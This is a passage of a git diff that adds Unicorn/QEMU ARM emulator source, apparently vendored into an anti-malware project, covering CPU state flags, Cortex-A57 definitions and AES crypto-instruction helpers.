*/ + bool secure = false; + /* If in EL1/0, Physical IRQ routing to EL2 only happens from NS state. */ + bool irq_can_hyp = !secure && cur_el < 2 && target_el == 2; + + /* Don't take exceptions if they target a lower EL. */ + if (cur_el > target_el) { + return false; + } + + switch (excp_idx) { + case EXCP_FIQ: + if (irq_can_hyp && (env->cp15.hcr_el2 & HCR_FMO)) { + return true; + } + return !(env->daif & PSTATE_F); + case EXCP_IRQ: + if (irq_can_hyp && (env->cp15.hcr_el2 & HCR_IMO)) { + return true; + } + return !(env->daif & PSTATE_I); + case EXCP_VFIQ: + if (secure || !(env->cp15.hcr_el2 & HCR_FMO)) { + /* VFIQs are only taken when hypervized and non-secure. */ + return false; + } + return !(env->daif & PSTATE_F); + case EXCP_VIRQ: + if (secure || !(env->cp15.hcr_el2 & HCR_IMO)) { + /* VIRQs are only taken when hypervized and non-secure. */ + return false; + } + return !(env->daif & PSTATE_I); + default: + g_assert_not_reached(); + return false; + } +} + +static inline CPUARMState *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + ARMCPU *cpu = cpu_arm_init(uc, cpu_model); + if (cpu) { + return &cpu->env; + } + return NULL; +} + +#ifdef TARGET_ARM +#define cpu_exec cpu_arm_exec +#define cpu_gen_code cpu_arm_gen_code +#define cpu_signal_handler cpu_arm_signal_handler +#define cpu_list arm_cpu_list +#endif + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _user +#define MMU_MODE1_SUFFIX _kernel +#define MMU_USER_IDX 0 +static inline int cpu_mmu_index (CPUARMState *env) +{ + return arm_current_el(env); +} + +/* Return the Exception Level targeted by debug exceptions; + * currently always EL1 since we don't implement EL2 or EL3. 
+ */ +static inline int arm_debug_target_el(CPUARMState *env) +{ + return 1; +} + +static inline bool aa64_generate_debug_exceptions(CPUARMState *env) +{ + if (arm_current_el(env) == arm_debug_target_el(env)) { + if ((extract32(env->cp15.mdscr_el1, 13, 1) == 0) + || (env->daif & PSTATE_D)) { + return false; + } + } + return true; +} + +static inline bool aa32_generate_debug_exceptions(CPUARMState *env) +{ + if (arm_current_el(env) == 0 && arm_el_is_aa64(env, 1)) { + return aa64_generate_debug_exceptions(env); + } + return arm_current_el(env) != 2; +} + +/* Return true if debugging exceptions are currently enabled. + * This corresponds to what in ARM ARM pseudocode would be + * if UsingAArch32() then + * return AArch32.GenerateDebugExceptions() + * else + * return AArch64.GenerateDebugExceptions() + * We choose to push the if() down into this function for clarity, + * since the pseudocode has it at all callsites except for the one in + * CheckSoftwareStep(), where it is elided because both branches would + * always return the same value. + * + * Parts of the pseudocode relating to EL2 and EL3 are omitted because we + * don't yet implement those exception levels or their associated trap bits. + */ +static inline bool arm_generate_debug_exceptions(CPUARMState *env) +{ + if (env->aarch64) { + return aa64_generate_debug_exceptions(env); + } else { + return aa32_generate_debug_exceptions(env); + } +} + +/* Is single-stepping active? (Note that the "is EL_D AArch64?" check + * implicitly means this always returns false in pre-v8 CPUs.) + */ +static inline bool arm_singlestep_active(CPUARMState *env) +{ + return extract32(env->cp15.mdscr_el1, 0, 1) + && arm_el_is_aa64(env, arm_debug_target_el(env)) + && arm_generate_debug_exceptions(env); +} + +#include "exec/cpu-all.h" + +/* Bit usage in the TB flags field: bit 31 indicates whether we are + * in 32 or 64 bit mode. The meaning of the other bits depends on that. 
+ */ +#define ARM_TBFLAG_AARCH64_STATE_SHIFT 31 +#define ARM_TBFLAG_AARCH64_STATE_MASK (1U << ARM_TBFLAG_AARCH64_STATE_SHIFT) + +/* Bit usage when in AArch32 state: */ +#define ARM_TBFLAG_THUMB_SHIFT 0 +#define ARM_TBFLAG_THUMB_MASK (1 << ARM_TBFLAG_THUMB_SHIFT) +#define ARM_TBFLAG_VECLEN_SHIFT 1 +#define ARM_TBFLAG_VECLEN_MASK (0x7 << ARM_TBFLAG_VECLEN_SHIFT) +#define ARM_TBFLAG_VECSTRIDE_SHIFT 4 +#define ARM_TBFLAG_VECSTRIDE_MASK (0x3 << ARM_TBFLAG_VECSTRIDE_SHIFT) +#define ARM_TBFLAG_PRIV_SHIFT 6 +#define ARM_TBFLAG_PRIV_MASK (1 << ARM_TBFLAG_PRIV_SHIFT) +#define ARM_TBFLAG_VFPEN_SHIFT 7 +#define ARM_TBFLAG_VFPEN_MASK (1 << ARM_TBFLAG_VFPEN_SHIFT) +#define ARM_TBFLAG_CONDEXEC_SHIFT 8 +#define ARM_TBFLAG_CONDEXEC_MASK (0xff << ARM_TBFLAG_CONDEXEC_SHIFT) +#define ARM_TBFLAG_BSWAP_CODE_SHIFT 16 +#define ARM_TBFLAG_BSWAP_CODE_MASK (1 << ARM_TBFLAG_BSWAP_CODE_SHIFT) +#define ARM_TBFLAG_CPACR_FPEN_SHIFT 17 +#define ARM_TBFLAG_CPACR_FPEN_MASK (1 << ARM_TBFLAG_CPACR_FPEN_SHIFT) +#define ARM_TBFLAG_SS_ACTIVE_SHIFT 18 +#define ARM_TBFLAG_SS_ACTIVE_MASK (1 << ARM_TBFLAG_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_PSTATE_SS_SHIFT 19 +#define ARM_TBFLAG_PSTATE_SS_MASK (1 << ARM_TBFLAG_PSTATE_SS_SHIFT) +/* We store the bottom two bits of the CPAR as TB flags and handle + * checks on the other bits at runtime + */ +#define ARM_TBFLAG_XSCALE_CPAR_SHIFT 20 +#define ARM_TBFLAG_XSCALE_CPAR_MASK (3 << ARM_TBFLAG_XSCALE_CPAR_SHIFT) + +/* Bit usage when in AArch64 state */ +#define ARM_TBFLAG_AA64_EL_SHIFT 0 +#define ARM_TBFLAG_AA64_EL_MASK (0x3 << ARM_TBFLAG_AA64_EL_SHIFT) +#define ARM_TBFLAG_AA64_FPEN_SHIFT 2 +#define ARM_TBFLAG_AA64_FPEN_MASK (1 << ARM_TBFLAG_AA64_FPEN_SHIFT) +#define ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT 3 +#define ARM_TBFLAG_AA64_SS_ACTIVE_MASK (1 << ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_AA64_PSTATE_SS_SHIFT 4 +#define ARM_TBFLAG_AA64_PSTATE_SS_MASK (1 << ARM_TBFLAG_AA64_PSTATE_SS_SHIFT) + +/* some convenience accessor macros */ +#define 
ARM_TBFLAG_AARCH64_STATE(F) \ + (((F) & ARM_TBFLAG_AARCH64_STATE_MASK) >> ARM_TBFLAG_AARCH64_STATE_SHIFT) +#define ARM_TBFLAG_THUMB(F) \ + (((F) & ARM_TBFLAG_THUMB_MASK) >> ARM_TBFLAG_THUMB_SHIFT) +#define ARM_TBFLAG_VECLEN(F) \ + (((F) & ARM_TBFLAG_VECLEN_MASK) >> ARM_TBFLAG_VECLEN_SHIFT) +#define ARM_TBFLAG_VECSTRIDE(F) \ + (((F) & ARM_TBFLAG_VECSTRIDE_MASK) >> ARM_TBFLAG_VECSTRIDE_SHIFT) +#define ARM_TBFLAG_PRIV(F) \ + (((F) & ARM_TBFLAG_PRIV_MASK) >> ARM_TBFLAG_PRIV_SHIFT) +#define ARM_TBFLAG_VFPEN(F) \ + (((F) & ARM_TBFLAG_VFPEN_MASK) >> ARM_TBFLAG_VFPEN_SHIFT) +#define ARM_TBFLAG_CONDEXEC(F) \ + (((F) & ARM_TBFLAG_CONDEXEC_MASK) >> ARM_TBFLAG_CONDEXEC_SHIFT) +#define ARM_TBFLAG_BSWAP_CODE(F) \ + (((F) & ARM_TBFLAG_BSWAP_CODE_MASK) >> ARM_TBFLAG_BSWAP_CODE_SHIFT) +#define ARM_TBFLAG_CPACR_FPEN(F) \ + (((F) & ARM_TBFLAG_CPACR_FPEN_MASK) >> ARM_TBFLAG_CPACR_FPEN_SHIFT) +#define ARM_TBFLAG_SS_ACTIVE(F) \ + (((F) & ARM_TBFLAG_SS_ACTIVE_MASK) >> ARM_TBFLAG_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_PSTATE_SS(F) \ + (((F) & ARM_TBFLAG_PSTATE_SS_MASK) >> ARM_TBFLAG_PSTATE_SS_SHIFT) +#define ARM_TBFLAG_XSCALE_CPAR(F) \ + (((F) & ARM_TBFLAG_XSCALE_CPAR_MASK) >> ARM_TBFLAG_XSCALE_CPAR_SHIFT) +#define ARM_TBFLAG_AA64_EL(F) \ + (((F) & ARM_TBFLAG_AA64_EL_MASK) >> ARM_TBFLAG_AA64_EL_SHIFT) +#define ARM_TBFLAG_AA64_FPEN(F) \ + (((F) & ARM_TBFLAG_AA64_FPEN_MASK) >> ARM_TBFLAG_AA64_FPEN_SHIFT) +#define ARM_TBFLAG_AA64_SS_ACTIVE(F) \ + (((F) & ARM_TBFLAG_AA64_SS_ACTIVE_MASK) >> ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_AA64_PSTATE_SS(F) \ + (((F) & ARM_TBFLAG_AA64_PSTATE_SS_MASK) >> ARM_TBFLAG_AA64_PSTATE_SS_SHIFT) + +static inline void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + int fpen; + + if (arm_feature(env, ARM_FEATURE_V6)) { + fpen = extract32(env->cp15.c1_coproc, 20, 2); + } else { + /* CPACR doesn't exist before v6, so VFP is always accessible */ + fpen = 3; + } + + if (is_a64(env)) { + *pc = env->pc; + 
*flags = ARM_TBFLAG_AARCH64_STATE_MASK + | (arm_current_el(env) << ARM_TBFLAG_AA64_EL_SHIFT); + if (fpen == 3 || (fpen == 1 && arm_current_el(env) != 0)) { + *flags |= ARM_TBFLAG_AA64_FPEN_MASK; + } + /* The SS_ACTIVE and PSTATE_SS bits correspond to the state machine + * states defined in the ARM ARM for software singlestep: + * SS_ACTIVE PSTATE.SS State + * 0 x Inactive (the TB flag for SS is always 0) + * 1 0 Active-pending + * 1 1 Active-not-pending + */ + if (arm_singlestep_active(env)) { + *flags |= ARM_TBFLAG_AA64_SS_ACTIVE_MASK; + if (env->pstate & PSTATE_SS) { + *flags |= ARM_TBFLAG_AA64_PSTATE_SS_MASK; + } + } + } else { + int privmode; + *pc = env->regs[15]; + *flags = (env->thumb << ARM_TBFLAG_THUMB_SHIFT) + | (env->vfp.vec_len << ARM_TBFLAG_VECLEN_SHIFT) + | (env->vfp.vec_stride << ARM_TBFLAG_VECSTRIDE_SHIFT) + | (env->condexec_bits << ARM_TBFLAG_CONDEXEC_SHIFT) + | (env->bswap_code << ARM_TBFLAG_BSWAP_CODE_SHIFT); + if (arm_feature(env, ARM_FEATURE_M)) { + privmode = !((env->v7m.exception == 0) && (env->v7m.control & 1)); + } else { + privmode = (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR; + } + if (privmode) { + *flags |= ARM_TBFLAG_PRIV_MASK; + } + if (env->vfp.xregs[ARM_VFP_FPEXC] & (1 << 30) + || arm_el_is_aa64(env, 1)) { + *flags |= ARM_TBFLAG_VFPEN_MASK; + } + if (fpen == 3 || (fpen == 1 && arm_current_el(env) != 0)) { + *flags |= ARM_TBFLAG_CPACR_FPEN_MASK; + } + /* The SS_ACTIVE and PSTATE_SS bits correspond to the state machine + * states defined in the ARM ARM for software singlestep: + * SS_ACTIVE PSTATE.SS State + * 0 x Inactive (the TB flag for SS is always 0) + * 1 0 Active-pending + * 1 1 Active-not-pending + */ + if (arm_singlestep_active(env)) { + *flags |= ARM_TBFLAG_SS_ACTIVE_MASK; + if (env->uncached_cpsr & PSTATE_SS) { + *flags |= ARM_TBFLAG_PSTATE_SS_MASK; + } + } + *flags |= (extract32(env->cp15.c15_cpar, 0, 2) + << ARM_TBFLAG_XSCALE_CPAR_SHIFT); + } + + *cs_base = 0; +} + +#include "exec/exec-all.h" + +static inline void 
cpu_pc_from_tb(CPUARMState *env, TranslationBlock *tb) +{ + if (ARM_TBFLAG_AARCH64_STATE(tb->flags)) { + env->pc = tb->pc; + } else { + env->regs[15] = tb->pc; + } +} + +enum { + QEMU_PSCI_CONDUIT_DISABLED = 0, + QEMU_PSCI_CONDUIT_SMC = 1, + QEMU_PSCI_CONDUIT_HVC = 2, +}; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c new file mode 100644 index 0000000..30948ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c @@ -0,0 +1,224 @@ +/* + * QEMU AArch64 CPU + * + * Copyright (c) 2013 Linaro Ltd + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "cpu.h" +#include "qemu-common.h" +#include "hw/arm/arm.h" +#include "sysemu/sysemu.h" + +static inline void set_feature(CPUARMState *env, int feature) +{ + env->features |= 1ULL << feature; +} + +#ifndef CONFIG_USER_ONLY +static uint64_t a57_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Number of processors is in [25:24]; otherwise we RAZ */ + return (smp_cpus - 1) << 24; +} +#endif + +static const ARMCPRegInfo cortexa57_cp_reginfo[] = { +#ifndef CONFIG_USER_ONLY + { "L2CTLR_EL1", 0,11,0, 3,1,2, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, 0, + NULL, a57_l2ctlr_read, arm_cp_write_ignore, }, + { "L2CTLR", 15,9,0, 0,1,2, 0, + 0, PL1_RW, NULL, 0, 0, + NULL, a57_l2ctlr_read, arm_cp_write_ignore, }, +#endif + { "L2ECTLR_EL1", 0,11,0, 3,1,3, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2ECTLR", 15,9,0, 0,1,3, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2ACTLR", 0,15,0, 3,1,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUACTLR_EL1", 0,15,2, 3,1,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUACTLR", 15,0,15, 0,0,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0, }, + { "CPUECTLR_EL1", 0,15,2, 3,1,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "CPUECTLR", 15,0,15, 0,1,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0, }, + { "CPUMERRSR_EL1", 0,15,2, 3,1,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUMERRSR", 15,0,15, 0,2,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0 }, + { "L2MERRSR_EL1", 0,15,2, 3,1,3, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "L2MERRSR", 15,0,15, 0,3,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static void aarch64_a57_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + set_feature(&cpu->env, ARM_FEATURE_V8); + 
set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); + set_feature(&cpu->env, ARM_FEATURE_AARCH64); + set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->kvm_target = QEMU_KVM_ARM_TARGET_CORTEX_A57; + cpu->midr = 0x411fd070; + cpu->reset_fpsid = 0x41034070; + cpu->mvfr0 = 0x10110222; + cpu->mvfr1 = 0x12111111; + cpu->mvfr2 = 0x00000043; + cpu->ctr = 0x8444c004; + cpu->reset_sctlr = 0x00c50838; + cpu->id_pfr0 = 0x00000131; + cpu->id_pfr1 = 0x00011011; + cpu->id_dfr0 = 0x03010066; + cpu->id_afr0 = 0x00000000; + cpu->id_mmfr0 = 0x10101105; + cpu->id_mmfr1 = 0x40000000; + cpu->id_mmfr2 = 0x01260000; + cpu->id_mmfr3 = 0x02102211; + cpu->id_isar0 = 0x02101110; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232042; + cpu->id_isar3 = 0x01112131; + cpu->id_isar4 = 0x00011142; + cpu->id_isar5 = 0x00011121; + cpu->id_aa64pfr0 = 0x00002222; + cpu->id_aa64dfr0 = 0x10305106; + cpu->id_aa64isar0 = 0x00011120; + cpu->id_aa64mmfr0 = 0x00001124; + cpu->dbgdidr = 0x3516d000; + cpu->clidr = 0x0a200023; + cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache */ + cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ + cpu->ccsidr[2] = 0x70ffe07a; /* 2048KB L2 cache */ + cpu->dcz_blocksize = 4; /* 64 bytes */ + define_arm_cp_regs(cpu, cortexa57_cp_reginfo); +} + +#ifdef CONFIG_USER_ONLY +static void aarch64_any_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + set_feature(&cpu->env, ARM_FEATURE_V8); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_AARCH64); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + 
set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->ctr = 0x80038003; /* 32 byte I and D cacheline size, VIPT icache */ + cpu->dcz_blocksize = 7; /* 512 bytes */ +} +#endif + +typedef struct ARMCPUInfo { + const char *name; + void (*initfn)(struct uc_struct *uc, Object *obj, void *opaque); + void (*class_init)(struct uc_struct *uc, ObjectClass *oc, void *data); +} ARMCPUInfo; + +static const ARMCPUInfo aarch64_cpus[] = { + { "cortex-a57", aarch64_a57_initfn }, +#ifdef CONFIG_USER_ONLY + { "any", aarch64_any_initfn }, +#endif + { NULL } +}; + +static void aarch64_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void aarch64_cpu_finalizefn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void aarch64_cpu_set_pc(CPUState *cs, vaddr value) +{ + //CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(NULL, cs); + /* It's OK to look at env for the current mode here, because it's + * never possible for an AArch64 TB to chain to an AArch32 TB. + * (Otherwise we would need to use synchronize_from_tb instead.) 
+ */ + if (is_a64(&cpu->env)) { + cpu->env.pc = value; + } else { + cpu->env.regs[15] = value; + } +} + +static void aarch64_cpu_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + CPUClass *cc = CPU_CLASS(uc, oc); + +#if !defined(CONFIG_USER_ONLY) + cc->do_interrupt = aarch64_cpu_do_interrupt; +#endif + cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; + cc->set_pc = aarch64_cpu_set_pc; +} + +static void aarch64_cpu_register(struct uc_struct *uc, const ARMCPUInfo *info) +{ + TypeInfo type_info = { 0 }; + type_info.parent = TYPE_AARCH64_CPU; + type_info.instance_size = sizeof(ARMCPU); + type_info.instance_init = info->initfn; + type_info.class_size = sizeof(ARMCPUClass); + type_info.class_init = info->class_init; + + type_info.name = g_strdup_printf("%s-" TYPE_ARM_CPU, info->name); + type_register(uc, &type_info); + g_free((void *)type_info.name); +} + +void aarch64_cpu_register_types(void *opaque) +{ + const ARMCPUInfo *info = aarch64_cpus; + + static TypeInfo aarch64_cpu_type_info = { 0 }; + aarch64_cpu_type_info.name = TYPE_AARCH64_CPU; + aarch64_cpu_type_info.parent = TYPE_ARM_CPU; + aarch64_cpu_type_info.instance_size = sizeof(ARMCPU); + aarch64_cpu_type_info.instance_init = aarch64_cpu_initfn; + aarch64_cpu_type_info.instance_finalize = aarch64_cpu_finalizefn; + aarch64_cpu_type_info.abstract = true; + aarch64_cpu_type_info.class_size = sizeof(AArch64CPUClass); + aarch64_cpu_type_info.class_init = aarch64_cpu_class_init; + + type_register_static(opaque, &aarch64_cpu_type_info); + + while (info->name) { + aarch64_cpu_register(opaque, info); + info++; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c new file mode 100644 index 0000000..59988ed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c @@ -0,0 +1,435 @@ +/* + * crypto_helper.c - emulate v8 Crypto Extensions instructions + * + * Copyright 
(C) 2013 - 2014 Linaro Ltd + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + */ + +#include + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" +#include "qemu/aes.h" + +union CRYPTO_STATE { + uint8_t bytes[16]; + uint32_t words[4]; + uint64_t l[2]; +}; + +void HELPER(crypto_aese)(CPUARMState *env, uint32_t rd, uint32_t rm, + uint32_t decrypt) +{ + static uint8_t const * const sbox[2] = { AES_sbox, AES_isbox }; + static uint8_t const * const shift[2] = { AES_shifts, AES_ishifts }; + + union CRYPTO_STATE rk; + union CRYPTO_STATE st; + int i; + + rk.l[0] = float64_val(env->vfp.regs[rm]); + rk.l[1] = float64_val(env->vfp.regs[rm + 1]); + st.l[0] = float64_val(env->vfp.regs[rd]); + st.l[1] = float64_val(env->vfp.regs[rd + 1]); + + assert(decrypt < 2); + + /* xor state vector with round key */ + rk.l[0] ^= st.l[0]; + rk.l[1] ^= st.l[1]; + + /* combine ShiftRows operation and sbox substitution */ + for (i = 0; i < 16; i++) { + st.bytes[i] = sbox[decrypt][rk.bytes[shift[decrypt][i]]]; + } + + env->vfp.regs[rd] = make_float64(st.l[0]); + env->vfp.regs[rd + 1] = make_float64(st.l[1]); +} + +void HELPER(crypto_aesmc)(CPUARMState *env, uint32_t rd, uint32_t rm, + uint32_t decrypt) +{ + static uint32_t const mc[][256] = { { + /* MixColumns lookup table */ + 0x00000000, 0x03010102, 0x06020204, 0x05030306, + 0x0c040408, 0x0f05050a, 0x0a06060c, 0x0907070e, + 0x18080810, 0x1b090912, 0x1e0a0a14, 0x1d0b0b16, + 0x140c0c18, 0x170d0d1a, 0x120e0e1c, 0x110f0f1e, + 0x30101020, 0x33111122, 0x36121224, 0x35131326, + 0x3c141428, 0x3f15152a, 0x3a16162c, 0x3917172e, + 0x28181830, 0x2b191932, 0x2e1a1a34, 0x2d1b1b36, + 0x241c1c38, 0x271d1d3a, 0x221e1e3c, 0x211f1f3e, + 0x60202040, 0x63212142, 0x66222244, 0x65232346, + 0x6c242448, 0x6f25254a, 0x6a26264c, 
0x6927274e, + 0x78282850, 0x7b292952, 0x7e2a2a54, 0x7d2b2b56, + 0x742c2c58, 0x772d2d5a, 0x722e2e5c, 0x712f2f5e, + 0x50303060, 0x53313162, 0x56323264, 0x55333366, + 0x5c343468, 0x5f35356a, 0x5a36366c, 0x5937376e, + 0x48383870, 0x4b393972, 0x4e3a3a74, 0x4d3b3b76, + 0x443c3c78, 0x473d3d7a, 0x423e3e7c, 0x413f3f7e, + 0xc0404080, 0xc3414182, 0xc6424284, 0xc5434386, + 0xcc444488, 0xcf45458a, 0xca46468c, 0xc947478e, + 0xd8484890, 0xdb494992, 0xde4a4a94, 0xdd4b4b96, + 0xd44c4c98, 0xd74d4d9a, 0xd24e4e9c, 0xd14f4f9e, + 0xf05050a0, 0xf35151a2, 0xf65252a4, 0xf55353a6, + 0xfc5454a8, 0xff5555aa, 0xfa5656ac, 0xf95757ae, + 0xe85858b0, 0xeb5959b2, 0xee5a5ab4, 0xed5b5bb6, + 0xe45c5cb8, 0xe75d5dba, 0xe25e5ebc, 0xe15f5fbe, + 0xa06060c0, 0xa36161c2, 0xa66262c4, 0xa56363c6, + 0xac6464c8, 0xaf6565ca, 0xaa6666cc, 0xa96767ce, + 0xb86868d0, 0xbb6969d2, 0xbe6a6ad4, 0xbd6b6bd6, + 0xb46c6cd8, 0xb76d6dda, 0xb26e6edc, 0xb16f6fde, + 0x907070e0, 0x937171e2, 0x967272e4, 0x957373e6, + 0x9c7474e8, 0x9f7575ea, 0x9a7676ec, 0x997777ee, + 0x887878f0, 0x8b7979f2, 0x8e7a7af4, 0x8d7b7bf6, + 0x847c7cf8, 0x877d7dfa, 0x827e7efc, 0x817f7ffe, + 0x9b80801b, 0x98818119, 0x9d82821f, 0x9e83831d, + 0x97848413, 0x94858511, 0x91868617, 0x92878715, + 0x8388880b, 0x80898909, 0x858a8a0f, 0x868b8b0d, + 0x8f8c8c03, 0x8c8d8d01, 0x898e8e07, 0x8a8f8f05, + 0xab90903b, 0xa8919139, 0xad92923f, 0xae93933d, + 0xa7949433, 0xa4959531, 0xa1969637, 0xa2979735, + 0xb398982b, 0xb0999929, 0xb59a9a2f, 0xb69b9b2d, + 0xbf9c9c23, 0xbc9d9d21, 0xb99e9e27, 0xba9f9f25, + 0xfba0a05b, 0xf8a1a159, 0xfda2a25f, 0xfea3a35d, + 0xf7a4a453, 0xf4a5a551, 0xf1a6a657, 0xf2a7a755, + 0xe3a8a84b, 0xe0a9a949, 0xe5aaaa4f, 0xe6abab4d, + 0xefacac43, 0xecadad41, 0xe9aeae47, 0xeaafaf45, + 0xcbb0b07b, 0xc8b1b179, 0xcdb2b27f, 0xceb3b37d, + 0xc7b4b473, 0xc4b5b571, 0xc1b6b677, 0xc2b7b775, + 0xd3b8b86b, 0xd0b9b969, 0xd5baba6f, 0xd6bbbb6d, + 0xdfbcbc63, 0xdcbdbd61, 0xd9bebe67, 0xdabfbf65, + 0x5bc0c09b, 0x58c1c199, 0x5dc2c29f, 0x5ec3c39d, + 0x57c4c493, 0x54c5c591, 0x51c6c697, 
0x52c7c795, + 0x43c8c88b, 0x40c9c989, 0x45caca8f, 0x46cbcb8d, + 0x4fcccc83, 0x4ccdcd81, 0x49cece87, 0x4acfcf85, + 0x6bd0d0bb, 0x68d1d1b9, 0x6dd2d2bf, 0x6ed3d3bd, + 0x67d4d4b3, 0x64d5d5b1, 0x61d6d6b7, 0x62d7d7b5, + 0x73d8d8ab, 0x70d9d9a9, 0x75dadaaf, 0x76dbdbad, + 0x7fdcdca3, 0x7cdddda1, 0x79dedea7, 0x7adfdfa5, + 0x3be0e0db, 0x38e1e1d9, 0x3de2e2df, 0x3ee3e3dd, + 0x37e4e4d3, 0x34e5e5d1, 0x31e6e6d7, 0x32e7e7d5, + 0x23e8e8cb, 0x20e9e9c9, 0x25eaeacf, 0x26ebebcd, + 0x2fececc3, 0x2cededc1, 0x29eeeec7, 0x2aefefc5, + 0x0bf0f0fb, 0x08f1f1f9, 0x0df2f2ff, 0x0ef3f3fd, + 0x07f4f4f3, 0x04f5f5f1, 0x01f6f6f7, 0x02f7f7f5, + 0x13f8f8eb, 0x10f9f9e9, 0x15fafaef, 0x16fbfbed, + 0x1ffcfce3, 0x1cfdfde1, 0x19fefee7, 0x1affffe5, + }, { + /* Inverse MixColumns lookup table */ + 0x00000000, 0x0b0d090e, 0x161a121c, 0x1d171b12, + 0x2c342438, 0x27392d36, 0x3a2e3624, 0x31233f2a, + 0x58684870, 0x5365417e, 0x4e725a6c, 0x457f5362, + 0x745c6c48, 0x7f516546, 0x62467e54, 0x694b775a, + 0xb0d090e0, 0xbbdd99ee, 0xa6ca82fc, 0xadc78bf2, + 0x9ce4b4d8, 0x97e9bdd6, 0x8afea6c4, 0x81f3afca, + 0xe8b8d890, 0xe3b5d19e, 0xfea2ca8c, 0xf5afc382, + 0xc48cfca8, 0xcf81f5a6, 0xd296eeb4, 0xd99be7ba, + 0x7bbb3bdb, 0x70b632d5, 0x6da129c7, 0x66ac20c9, + 0x578f1fe3, 0x5c8216ed, 0x41950dff, 0x4a9804f1, + 0x23d373ab, 0x28de7aa5, 0x35c961b7, 0x3ec468b9, + 0x0fe75793, 0x04ea5e9d, 0x19fd458f, 0x12f04c81, + 0xcb6bab3b, 0xc066a235, 0xdd71b927, 0xd67cb029, + 0xe75f8f03, 0xec52860d, 0xf1459d1f, 0xfa489411, + 0x9303e34b, 0x980eea45, 0x8519f157, 0x8e14f859, + 0xbf37c773, 0xb43ace7d, 0xa92dd56f, 0xa220dc61, + 0xf66d76ad, 0xfd607fa3, 0xe07764b1, 0xeb7a6dbf, + 0xda595295, 0xd1545b9b, 0xcc434089, 0xc74e4987, + 0xae053edd, 0xa50837d3, 0xb81f2cc1, 0xb31225cf, + 0x82311ae5, 0x893c13eb, 0x942b08f9, 0x9f2601f7, + 0x46bde64d, 0x4db0ef43, 0x50a7f451, 0x5baafd5f, + 0x6a89c275, 0x6184cb7b, 0x7c93d069, 0x779ed967, + 0x1ed5ae3d, 0x15d8a733, 0x08cfbc21, 0x03c2b52f, + 0x32e18a05, 0x39ec830b, 0x24fb9819, 